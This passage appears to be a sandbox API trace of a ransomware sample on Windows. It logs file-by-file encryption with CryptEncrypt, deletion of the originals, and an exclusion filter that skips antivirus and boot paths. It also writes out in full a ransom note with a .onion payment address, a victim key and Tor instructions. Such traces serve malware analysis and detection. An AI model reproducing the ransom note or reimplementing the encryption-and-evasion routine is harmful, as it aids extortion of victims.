lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.455] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.455] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.455] GetLastError () returned 0x0 [0169.455] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.456] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.456] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.456] GetLastError () returned 0x0 [0169.456] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.456] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.456] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.456] GetLastError () returned 0x0 [0169.456] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.456] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.456] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.456] GetLastError () returned 0x0 [0169.456] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.456] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.456] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.456] GetLastError () returned 0x0 [0169.456] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.456] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.456] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.456] GetLastError () returned 0x0 [0169.456] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.456] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.456] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.456] GetLastError () returned 0x0 [0169.456] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.456] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.457] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0169.457] GetLastError () returned 0x0 [0169.457] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0169.457] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0169.457] WriteFile (in: hFile=0x15c4, lpBuffer=0x2893368*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0169.457] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui")) returned 0x20 [0169.457] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui", dwFileAttributes=0x20) returned 0 [0169.457] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui") returned 1 [0169.457] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui")) returned 0 [0169.458] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" [0169.458] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned 1 [0169.458] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX988.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx988.tmp")) returned 0x988 [0169.458] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX988.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx988.tmp"), dwFlags=0x1) returned 0 [0169.458] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX988.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx988.tmp")) returned 1 [0169.459] CryptDestroyKey (hKey=0x9ad138) returned 1 [0169.459] wcslen (_String="OK") returned 0x2 [0169.459] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.459] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.459] CryptDestroyKey (hKey=0x9ad338) returned 1 [0169.459] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0169.459] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0169.459] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0169.459] GetLastError () returned 0x12 [0169.459] FindClose (in: hFindFile=0x9ad5f8 | out: hFindFile=0x9ad5f8) returned 1 [0169.459] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\Recovers your files.html" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0169.459] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0169.461] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0169.461] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0169.461] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.461] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.461] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0169.461] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.461] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*.exe") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*.dll") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*.lnk") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*.bat") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*.ini") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*.msi") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*.scf") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*pagefile.sys*") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*NTUSER.DAT*") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*AppData*") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*\\winrar\\*") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*\\java\\*") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*\\windows\\*") returned 0 [0169.461] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*\\ESET\\*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*\\AVG\\*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*\\AVIRA\\*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*Atheros*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*Realtek*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*bootmgr*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*boot*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*boot*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*CONFIG.SYS*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*IO.SYS*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*MSDOS.SYS*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*NTDETECT.COM*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*ntldr*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*chrome*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*opera*") returned 0 [0169.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\*", pszSpec="*firefox*") returned 0 [0169.462] wcslen (_String="\\\\?\\") returned 0x4 [0169.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad538 [0169.462] wcscmp (_String1=".", _String2=".") returned 0 [0169.462] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.462] wcscmp (_String1="..", _String2=".") returned 1 [0169.462] wcscmp (_String1="..", _String2="..") returned 0 [0169.462] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.463] wcscmp (_String1="en-US", _String2=".") returned 1 [0169.463] wcscmp (_String1="en-US", _String2="..") returned 1 [0169.463] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.463] PathMatchSpecW (pszFile="msdaosp.dll", pszSpec="*NMCRYPT") returned 0 [0169.463] PathMatchSpecW (pszFile="msdaosp.dll", pszSpec="*Recovers your files.html") returned 0 [0169.463] PathMatchSpecW (pszFile="msdaosp.dll", pszSpec="*.exe") returned 0 [0169.463] PathMatchSpecW (pszFile="msdaosp.dll", pszSpec="*.dll") returned 1 [0169.463] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.463] PathMatchSpecW (pszFile="msdaps.dll", pszSpec="*NMCRYPT") returned 0 [0169.463] PathMatchSpecW (pszFile="msdaps.dll", pszSpec="*Recovers your files.html") returned 0 [0169.463] PathMatchSpecW (pszFile="msdaps.dll", pszSpec="*.exe") returned 0 [0169.463] PathMatchSpecW (pszFile="msdaps.dll", pszSpec="*.dll") returned 1 [0169.463] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.463] PathMatchSpecW (pszFile="msdasql.dll", pszSpec="*NMCRYPT") returned 0 [0169.463] PathMatchSpecW (pszFile="msdasql.dll", pszSpec="*Recovers your files.html") returned 0 [0169.463] PathMatchSpecW (pszFile="msdasql.dll", pszSpec="*.exe") returned 0 [0169.463] PathMatchSpecW (pszFile="msdasql.dll", pszSpec="*.dll") returned 1 [0169.463] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.463] PathMatchSpecW (pszFile="msdasqlr.dll", pszSpec="*NMCRYPT") returned 0 [0169.463] PathMatchSpecW (pszFile="msdasqlr.dll", pszSpec="*Recovers your files.html") returned 0 [0169.463] PathMatchSpecW (pszFile="msdasqlr.dll", pszSpec="*.exe") returned 0 [0169.463] PathMatchSpecW (pszFile="msdasqlr.dll", pszSpec="*.dll") returned 1 [0169.463] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.463] PathMatchSpecW (pszFile="msdatl3.dll", pszSpec="*NMCRYPT") returned 0 [0169.463] PathMatchSpecW (pszFile="msdatl3.dll", pszSpec="*Recovers your files.html") returned 0 [0169.463] PathMatchSpecW (pszFile="msdatl3.dll", pszSpec="*.exe") returned 0 [0169.463] PathMatchSpecW (pszFile="msdatl3.dll", pszSpec="*.dll") returned 1 [0169.463] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.463] PathMatchSpecW (pszFile="msxactps.dll", pszSpec="*NMCRYPT") returned 0 [0169.463] PathMatchSpecW (pszFile="msxactps.dll", pszSpec="*Recovers your files.html") returned 0 [0169.463] PathMatchSpecW (pszFile="msxactps.dll", pszSpec="*.exe") returned 0 [0169.463] PathMatchSpecW (pszFile="msxactps.dll", pszSpec="*.dll") returned 1 [0169.463] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.463] PathMatchSpecW (pszFile="oledb32.dll", pszSpec="*NMCRYPT") returned 0 [0169.463] PathMatchSpecW (pszFile="oledb32.dll", pszSpec="*Recovers your files.html") returned 0 [0169.463] PathMatchSpecW (pszFile="oledb32.dll", pszSpec="*.exe") returned 0 [0169.463] PathMatchSpecW (pszFile="oledb32.dll", pszSpec="*.dll") returned 1 [0169.463] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.464] PathMatchSpecW (pszFile="oledb32r.dll", pszSpec="*NMCRYPT") returned 0 [0169.464] PathMatchSpecW (pszFile="oledb32r.dll", pszSpec="*Recovers your files.html") returned 0 [0169.464] PathMatchSpecW (pszFile="oledb32r.dll", pszSpec="*.exe") returned 0 [0169.464] PathMatchSpecW (pszFile="oledb32r.dll", pszSpec="*.dll") returned 1 [0169.464] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*NMCRYPT") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*Recovers your files.html") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*.exe") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*.dll") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*.lnk") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*.bat") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*.ini") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*.msi") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*.scf") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*pagefile.sys*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*NTUSER.DAT*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*AppData*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*\\winrar\\*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*\\Internet Explorer\\*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*\\java\\*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*\\TeamViewer\\*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*\\windows\\*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*\\ESET\\*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*\\AVG\\*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*\\AVIRA\\*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*\\AVAST Software\\*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*Atheros*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*Realtek*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*bootmgr*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*boot*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*boot*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*CONFIG.SYS*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*IO.SYS*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*MSDOS.SYS*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*NTDETECT.COM*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*ntldr*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*chrome*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*opera*") returned 0 [0169.464] PathMatchSpecW (pszFile="oledbjvs.inc", pszSpec="*firefox*") returned 0 [0169.465] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc", pszSpec="*") returned 1 [0169.465] strlen (_Str="NMoreira") returned 0x8 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) 